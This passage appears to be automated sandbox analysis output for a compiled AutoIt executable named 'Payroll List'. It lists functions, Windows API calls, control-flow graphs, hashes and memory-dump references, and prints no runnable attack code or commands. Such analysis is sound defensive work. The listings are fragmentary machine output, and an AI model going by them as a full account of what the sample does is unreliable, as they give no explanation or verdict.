                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                    • API String ID: 438480954-3287110873
                                                                    • Opcode ID: 676fa6125f74720b485ef26a5ab36b48f1a0c3dcaf40f147d61b768588396e4a
                                                                    • Instruction ID: 0b43e67d4dbdd64d63c8064c94c10c74c5d63944d0a1809135435aa271e7a6d6
                                                                    • Opcode Fuzzy Hash: 676fa6125f74720b485ef26a5ab36b48f1a0c3dcaf40f147d61b768588396e4a
                                                                    • Instruction Fuzzy Hash: A7513B30E04299BECF15ABF0FC85EED7B79AF25700F004069F61267592DB744AA9CB21
                                                                    Function 0013DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1079 13ddc0-13de4f call 12d7f7 GetVersionExW call 126a63 call 13dfb4 call 126571 1088 1924c8-1924cb 1079->1088 1089 13de55-13de56 1079->1089 1090 1924cd 1088->1090 1091 1924e4-1924e8 1088->1091 1092 13de92-13dea2 call 13df77 1089->1092 1093 13de58-13de63 1089->1093 1095 1924d0 1090->1095 1096 1924ea-1924f3 1091->1096 1097 1924d3-1924dc 1091->1097 1108 13dec7-13dee1 1092->1108 1109 13dea4-13dec1 GetCurrentProcess call 13df5f 1092->1109 1098 19244e-192454 1093->1098 1099 13de69-13de6b 1093->1099 1095->1097 1096->1095 1105 1924f5-1924f8 1096->1105 1097->1091 1103 19245e-192464 1098->1103 1104 192456-192459 1098->1104 1100 192469-192475 1099->1100 1101 13de71-13de74 1099->1101 1110 19247f-192485 1100->1110 1111 192477-19247a 1100->1111 1106 13de7a-13de89 1101->1106 1107 192495-192498 1101->1107 1103->1092 1104->1092 1105->1097 1112 19248a-192490 1106->1112 1113 13de8f 1106->1113 1107->1092 1114 19249e-1924b3 1107->1114 1116 13dee3-13def7 call 13e00c 1108->1116 1117 13df31-13df3b GetSystemInfo 1108->1117 1109->1108 1131 13dec3 1109->1131 1110->1092 1111->1092 1112->1092 1113->1092 1118 1924bd-1924c3 1114->1118 1119 1924b5-1924b8 1114->1119 1126 13df29-13df2f GetSystemInfo 1116->1126 1127 13def9-13df01 call 13dff4 GetNativeSystemInfo 1116->1127 1121 13df0e-13df1a 1117->1121 1118->1092 1119->1092 1123 13df21-13df26 1121->1123 1124 13df1c-13df1f FreeLibrary 1121->1124 1124->1123 1130 13df03-13df07 1126->1130 1127->1130 1130->1121 1133 13df09-13df0c FreeLibrary 1130->1133 1131->1108 1133->1121
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 0013DDEC
                                                                    • GetCurrentProcess.KERNEL32(00000000,001BDC38,?,?), ref: 0013DEAC
                                                                    • GetNativeSystemInfo.KERNELBASE(?,001BDC38,?,?), ref: 0013DF01
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0013DF0C
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0013DF1F
                                                                    • GetSystemInfo.KERNEL32(?,001BDC38,?,?), ref: 0013DF29
                                                                    • GetSystemInfo.KERNEL32(?,001BDC38,?,?), ref: 0013DF35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                    • String ID:
                                                                    • API String ID: 3851250370-0
                                                                    • Opcode ID: 271afb62e84b9963411add1a003360f54af8728ce05669e64d84560c70b6be15
                                                                    • Instruction ID: 3e558a02b9abcfaa03a355f0120cca7e7c8b62064823e9bd9c6fcbb026998313
                                                                    • Opcode Fuzzy Hash: 271afb62e84b9963411add1a003360f54af8728ce05669e64d84560c70b6be15
                                                                    • Instruction Fuzzy Hash: B8618EB190A284DBCF15CF68A8C15E97FB4AF2A300F1989E9D8459F247C734CA49CB65
                                                                    Function 0012406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1151 12406b-124083 CreateStreamOnHGlobal 1152 1240a3-1240a6 1151->1152 1153 124085-12409c FindResourceExW 1151->1153 1154 1240a2 1153->1154 1155 194f16-194f25 LoadResource 1153->1155 1154->1152 1155->1154 1156 194f2b-194f39 SizeofResource 1155->1156 1156->1154 1157 194f3f-194f4a LockResource 1156->1157 1157->1154 1158 194f50-194f6e 1157->1158 1158->1154
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0012449E,?,?,00000000,00000001), ref: 0012407B
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0012449E,?,?,00000000,00000001), ref: 00124092
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,0012449E,?,?,00000000,00000001,?,?,?,?,?,?,001241FB), ref: 00194F1A
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,0012449E,?,?,00000000,00000001,?,?,?,?,?,?,001241FB), ref: 00194F2F
                                                                    • LockResource.KERNEL32(0012449E,?,?,0012449E,?,?,00000000,00000001,?,?,?,?,?,?,001241FB,00000000), ref: 00194F42
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: 3a2041656c2ab5c06e12f8f5875ec589567dbdd8410c949afeed2cf254bdea6f
                                                                    • Instruction ID: 4370c501e24768c15050224a7d2e765bf6db4a346949b9644283c0d48b560c50
                                                                    • Opcode Fuzzy Hash: 3a2041656c2ab5c06e12f8f5875ec589567dbdd8410c949afeed2cf254bdea6f
                                                                    • Instruction Fuzzy Hash: 4F115271200711BFE7218B65FC48FA77BB9EBCAB51F20416DF6029A660DB71DC80CA20
                                                                    Function 00166CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00192F49), ref: 00166CB9
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00166CCA
                                                                    • FindClose.KERNEL32(00000000), ref: 00166CDA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: 85a4ef843d79eb680c769464ccffc713dd188b8e6c561596648bb8921bb8972b
                                                                    • Instruction ID: bc0fb0409146c7648d5fddf049dc25e23cefefabb29e0251f992d03b43937b92
                                                                    • Opcode Fuzzy Hash: 85a4ef843d79eb680c769464ccffc713dd188b8e6c561596648bb8921bb8972b
                                                                    • Instruction Fuzzy Hash: 3DE04F31814D15ABC2246738FC0D8EA77ACEB1A339F104756F976C29E0EB70DD9486D6
                                                                    Function 0012E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012E959
                                                                    • timeGetTime.WINMM ref: 0012EBFA
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012ED2E
                                                                    • TranslateMessage.USER32(?), ref: 0012ED3F
                                                                    • DispatchMessageW.USER32(?), ref: 0012ED4A
                                                                    • LockWindowUpdate.USER32(00000000), ref: 0012ED79
                                                                    • DestroyWindow.USER32 ref: 0012ED85
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012ED9F
                                                                    • Sleep.KERNEL32(0000000A), ref: 00195270
                                                                    • TranslateMessage.USER32(?), ref: 001959F7
                                                                    • DispatchMessageW.USER32(?), ref: 00195A05
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00195A19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                    • API String ID: 2641332412-570651680
                                                                    • Opcode ID: e398be256a80ee08c64542e5fee78302a89a67a111cd5f9c4e27ce359a3abe5d
                                                                    • Instruction ID: 0c9b4f4ec5023cf422a580fabad93793e80f442ad5c90388cd12ec446904acf7
                                                                    • Opcode Fuzzy Hash: e398be256a80ee08c64542e5fee78302a89a67a111cd5f9c4e27ce359a3abe5d
                                                                    • Instruction Fuzzy Hash: A062F370508350DFEB25DF64E885BAE77E5BF54304F08086DF98A9B292DB70D898CB52
                                                                    Function 00155C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___createFile.LIBCMT ref: 00155EC3
                                                                    • ___createFile.LIBCMT ref: 00155F04
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00155F2D
                                                                    • __dosmaperr.LIBCMT ref: 00155F34
                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00155F47
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00155F6A
                                                                    • __dosmaperr.LIBCMT ref: 00155F73
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00155F7C
                                                                    • __set_osfhnd.LIBCMT ref: 00155FAC
                                                                    • __lseeki64_nolock.LIBCMT ref: 00156016
                                                                    • __close_nolock.LIBCMT ref: 0015603C
                                                                    • __chsize_nolock.LIBCMT ref: 0015606C
                                                                    • __lseeki64_nolock.LIBCMT ref: 0015607E
                                                                    • __lseeki64_nolock.LIBCMT ref: 00156176
                                                                    • __lseeki64_nolock.LIBCMT ref: 0015618B
                                                                    • __close_nolock.LIBCMT ref: 001561EB
                                                                      • Part of subcall function 0014EA9C: CloseHandle.KERNELBASE(00000000,001CEEF4,00000000,?,00156041,001CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0014EAEC
                                                                      • Part of subcall function 0014EA9C: GetLastError.KERNEL32(?,00156041,001CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0014EAF6
                                                                      • Part of subcall function 0014EA9C: __free_osfhnd.LIBCMT ref: 0014EB03
                                                                      • Part of subcall function 0014EA9C: __dosmaperr.LIBCMT ref: 0014EB25
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    • __lseeki64_nolock.LIBCMT ref: 0015620D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00156342
                                                                    • ___createFile.LIBCMT ref: 00156361
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0015636E
                                                                    • __dosmaperr.LIBCMT ref: 00156375
                                                                    • __free_osfhnd.LIBCMT ref: 00156395
                                                                    • __invoke_watson.LIBCMT ref: 001563C3
                                                                    • __wsopen_helper.LIBCMT ref: 001563DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                    • String ID: @
                                                                    • API String ID: 3896587723-2766056989
                                                                    • Opcode ID: 47c36e7f680ca7145c5dc91b9261f5d2ce27efddfaf6dca7056ec84218d9e806
                                                                    • Instruction ID: c5cf0f00a03d9712ed695c5ae0ad8580110d7731cce8a5cce0a97716f0725054
                                                                    • Opcode Fuzzy Hash: 47c36e7f680ca7145c5dc91b9261f5d2ce27efddfaf6dca7056ec84218d9e806
                                                                    • Instruction Fuzzy Hash: 18222571900606DBEB299FA8CC957BD7B72EB10326F644229EC319F2E2C7358D48C791
                                                                    Function 0016FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _wcscpy.LIBCMT ref: 0016FA96
                                                                    • _wcschr.LIBCMT ref: 0016FAA4
                                                                    • _wcscpy.LIBCMT ref: 0016FABB
                                                                    • _wcscat.LIBCMT ref: 0016FACA
                                                                    • _wcscat.LIBCMT ref: 0016FAE8
                                                                    • _wcscpy.LIBCMT ref: 0016FB09
                                                                    • __wsplitpath.LIBCMT ref: 0016FBE6
                                                                    • _wcscpy.LIBCMT ref: 0016FC0B
                                                                    • _wcscpy.LIBCMT ref: 0016FC1D
                                                                    • _wcscpy.LIBCMT ref: 0016FC32
                                                                    • _wcscat.LIBCMT ref: 0016FC47
                                                                    • _wcscat.LIBCMT ref: 0016FC59
                                                                    • _wcscat.LIBCMT ref: 0016FC6E
                                                                      • Part of subcall function 0016BFA4: _wcscmp.LIBCMT ref: 0016C03E
                                                                      • Part of subcall function 0016BFA4: __wsplitpath.LIBCMT ref: 0016C083
                                                                      • Part of subcall function 0016BFA4: _wcscpy.LIBCMT ref: 0016C096
                                                                      • Part of subcall function 0016BFA4: _wcscat.LIBCMT ref: 0016C0A9
                                                                      • Part of subcall function 0016BFA4: __wsplitpath.LIBCMT ref: 0016C0CE
                                                                      • Part of subcall function 0016BFA4: _wcscat.LIBCMT ref: 0016C0E4
                                                                      • Part of subcall function 0016BFA4: _wcscat.LIBCMT ref: 0016C0F7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                    • API String ID: 2955681530-2806939583
                                                                    • Opcode ID: 12ea58b3cfcb19be258c082545872f2dbea9a8f902e3910ab2a0f8b162081e0b
                                                                    • Instruction ID: c6c27ffcb0b3edd0bcff7d32746184bf1752f4d0149f17175c3bb448c0589f3f
                                                                    • Opcode Fuzzy Hash: 12ea58b3cfcb19be258c082545872f2dbea9a8f902e3910ab2a0f8b162081e0b
                                                                    • Instruction Fuzzy Hash: CD9194715043059FCB21EF54D891E9EB3E8BF68310F04486DF959972A1DB30FA69CB92
                                                                    Function 0016BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0016BDB4: __time64.LIBCMT ref: 0016BDBE
                                                                      • Part of subcall function 00124517: _fseek.LIBCMT ref: 0012452F
                                                                    • __wsplitpath.LIBCMT ref: 0016C083
                                                                      • Part of subcall function 00141DFC: __wsplitpath_helper.LIBCMT ref: 00141E3C
                                                                    • _wcscpy.LIBCMT ref: 0016C096
                                                                    • _wcscat.LIBCMT ref: 0016C0A9
                                                                    • __wsplitpath.LIBCMT ref: 0016C0CE
                                                                    • _wcscat.LIBCMT ref: 0016C0E4
                                                                    • _wcscat.LIBCMT ref: 0016C0F7
                                                                    • _wcscmp.LIBCMT ref: 0016C03E
                                                                      • Part of subcall function 0016C56D: _wcscmp.LIBCMT ref: 0016C65D
                                                                      • Part of subcall function 0016C56D: _wcscmp.LIBCMT ref: 0016C670
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0016C2A1
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0016C338
                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0016C34E
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0016C35F
                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0016C371
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                    • String ID: p1Wu`KXu
                                                                    • API String ID: 2378138488-4063981602
                                                                    • Opcode ID: f1fda66b293bbc3544cd9848e880a46dbb489e062db96e8e10b67414ffd8697b
                                                                    • Instruction ID: 2ce31dbbb22a38a720402930dff1684ed6e837942170faf99f1e18eb05ebf001
                                                                    • Opcode Fuzzy Hash: f1fda66b293bbc3544cd9848e880a46dbb489e062db96e8e10b67414ffd8697b
                                                                    • Instruction Fuzzy Hash: C4C13EB1E00129AFDF21DF95DC81EEEB7BDAF59310F0040AAF649E6151DB309A948F61
                                                                    Function 00123F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00123F86
                                                                    • RegisterClassExW.USER32(00000030), ref: 00123FB0
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00123FC1
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00123FDE
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00123FEE
                                                                    • LoadIconW.USER32(000000A9), ref: 00124004
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00124013
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: cf682c48ab1ccc25ea2f4c8b61e10c6761a44cdda298dc9d5967b48cb1079056
                                                                    • Instruction ID: 5894b0d835da675e176e0bb4788eb07525847d439a753908819dd7df59582f16
                                                                    • Opcode Fuzzy Hash: cf682c48ab1ccc25ea2f4c8b61e10c6761a44cdda298dc9d5967b48cb1079056
                                                                    • Instruction Fuzzy Hash: 9B21C7B5900358AFDB00DFE4E989BCDBBB4FB09704F00421AF615AAAA0D7B445848F91
                                                                    Function 00123742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 961 123742-123762 963 1237c2-1237c4 961->963 964 123764-123767 961->964 963->964 965 1237c6 963->965 966 1237c8 964->966 967 123769-123770 964->967 968 1237ab-1237b3 DefWindowProcW 965->968 969 191e00-191e2e call 122ff6 call 13e312 966->969 970 1237ce-1237d1 966->970 971 123776-12377b 967->971 972 12382c-123834 PostQuitMessage 967->972 973 1237b9-1237bf 968->973 1004 191e33-191e3a 969->1004 974 1237d3-1237d4 970->974 975 1237f6-12381d SetTimer RegisterWindowMessageW 970->975 977 191e88-191e9c call 164ddd 971->977 978 123781-123783 971->978 979 1237f2-1237f4 972->979 980 1237da-1237ed KillTimer call 123847 call 12390f 974->980 981 191da3-191da6 974->981 975->979 983 12381f-12382a CreatePopupMenu 975->983 977->979 995 191ea2 977->995 984 123836-123840 call 13eb83 978->984 985 123789-12378e 978->985 979->973 980->979 988 191da8-191daa 981->988 989 191ddc-191dfb MoveWindow 981->989 983->979 996 123845 984->996 992 191e6d-191e74 985->992 993 123794-123799 985->993 997 191dcb-191dd7 SetFocus 988->997 998 191dac-191daf 988->998 989->979 992->968 1000 191e7a-191e83 call 15a5f3 992->1000 1002 191e58-191e68 call 1655bd 993->1002 1003 12379f-1237a5 993->1003 995->968 996->979 997->979 998->1003 1005 191db5-191dc6 call 122ff6 998->1005 1000->968 1002->979 1003->968 1003->1004 1004->968 1009 191e40-191e53 call 123847 call 124ffc 1004->1009 1005->979 1009->968
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 001237B3
                                                                    • KillTimer.USER32(?,00000001), ref: 001237DD
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00123800
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0012380B
                                                                    • CreatePopupMenu.USER32 ref: 0012381F
                                                                    • PostQuitMessage.USER32(00000000), ref: 0012382E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: 9e3c8af302f6f76d512ab1f625ae4ea230b09d2958dae463623b0a80f4ae5052
                                                                    • Instruction ID: 16db3f11d9615a75e9d30937470f20c01f5985ff4bfdab48b4718ef2b231accd
                                                                    • Opcode Fuzzy Hash: 9e3c8af302f6f76d512ab1f625ae4ea230b09d2958dae463623b0a80f4ae5052
                                                                    • Instruction Fuzzy Hash: FD415AF56006A6BBDF185FA8FD8AF7D3695F710300F000115F92296590CB789EF08761
                                                                    Function 00123E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00123E79
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00123E88
                                                                    • LoadIconW.USER32(00000063), ref: 00123E9E
                                                                    • LoadIconW.USER32(000000A4), ref: 00123EB0
                                                                    • LoadIconW.USER32(000000A2), ref: 00123EC2
                                                                      • Part of subcall function 00124024: LoadImageW.USER32(00120000,00000063,00000001,00000010,00000010,00000000), ref: 00124048
                                                                    • RegisterClassExW.USER32(?), ref: 00123F30
                                                                      • Part of subcall function 00123F53: GetSysColorBrush.USER32(0000000F), ref: 00123F86
                                                                      • Part of subcall function 00123F53: RegisterClassExW.USER32(00000030), ref: 00123FB0
                                                                      • Part of subcall function 00123F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00123FC1
